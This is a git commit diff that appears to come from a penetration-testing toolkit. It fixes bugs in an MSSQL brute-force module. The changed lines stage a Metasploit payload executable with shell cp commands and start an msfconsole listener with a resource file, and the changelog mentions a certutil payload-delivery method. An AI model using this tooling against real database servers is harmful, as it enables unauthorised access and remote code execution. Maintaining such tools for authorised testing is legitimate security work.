multiple fixes for mssql bruter

2024-11-26 22:40:18 +00:00 · 2016-07-30 15:32:49 -04:00 · 2016-07-30 15:32:49 -04:00 · 8ca2213fb3
commit 8ca2213fb3
parent 19e28fe7e0
3 changed files with 9 additions and 6 deletions
--- a/readme/CHANGELOG
+++ b/readme/CHANGELOG
@ -9,6 +9,9 @@ version 7.3.4
 * fixed an issue that would cause TDS to error out when directly connecting to MSSQL server
 * removed impacket TDS from src.core and added impacket.tds
 * updated requirements.txt for impacket
+* fixed a bug when using certutil method and pairing directory strings
+* fixed automatic brute on mssql server when single host was scanned
+* fixed spacing issue on msfconsole -r was set to msfconsole-r

 ~~~~~~~~~~~~~~~~
 version 7.3.3
--- a/src/core/fasttrack.py
+++ b/src/core/fasttrack.py
@ -114,7 +114,7 @@ try:
                                sqlport = get_sql_port(ip)
                                if sqlport == None:
                                    sql_nmap_scan(ip)
-                                    if sql_nmap_scan != None:
+                                    if sql_nmap_scan != "":
                                        sql_servers = sql_servers + \
                                            ip + ":" + "1433" + ","

@ -129,7 +129,7 @@ try:
                        # nada
                        if sqlport == None:
                            sql_nmap_scan(host)
-                            if sql_nmap_scan != None:
+                            if sql_nmap_scan != "":
                                sql_servers = sql_servers + \
                                    host + ":" + "1433" + ","
                        if sqlport != None:
--- a/src/fasttrack/mssql.py
+++ b/src/fasttrack/mssql.py
@ -189,11 +189,11 @@ def deploy_hex2binary(ipaddr, port, username, password):
                        if not os.path.isfile(core.setdir + "1msf.exe"):
                            # move it then
                            subprocess.Popen("cp %s/msf.exe %s/1msf.exe" %
-                                             (core.setdir + core.setdir), shell=True).wait()
+                                             (core.setdir, core.setdir), shell=True).wait()
                            subprocess.Popen("cp %s/1msf.exe %s/ 1> /dev/null 2> /dev/null" %
-                                             (core.setdir + core.setdir), shell=True).wait()
+                                             (core.setdir, core.setdir), shell=True).wait()
                            subprocess.Popen("cp %s/msf2.exe %s/msf.exe 1> /dev/null 2> /dev/null" %
-                                             (core.setdir + core.setdir), shell=True).wait()
+                                             (core.setdir, core.setdir), shell=True).wait()
            payload_filename = os.path.join(web_path + "1msf.exe")

        with open(payload_filename, "rb") as fileopen:
@ -216,7 +216,7 @@ def deploy_hex2binary(ipaddr, port, username, password):
                        import pexpect
                        core.print_status("Starting the Metasploit listener...")
                        msf_path = core.meta_path()
-                        child2 = pexpect.spawn("{0}-r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
+                        child2 = pexpect.spawn("{0} -r {1}\r\n\r\n".format(os.path.join(core.meta_path() + "msfconsole"),
                                                                        os.path.join(core.setdir + "meta_config")))

        # random executable name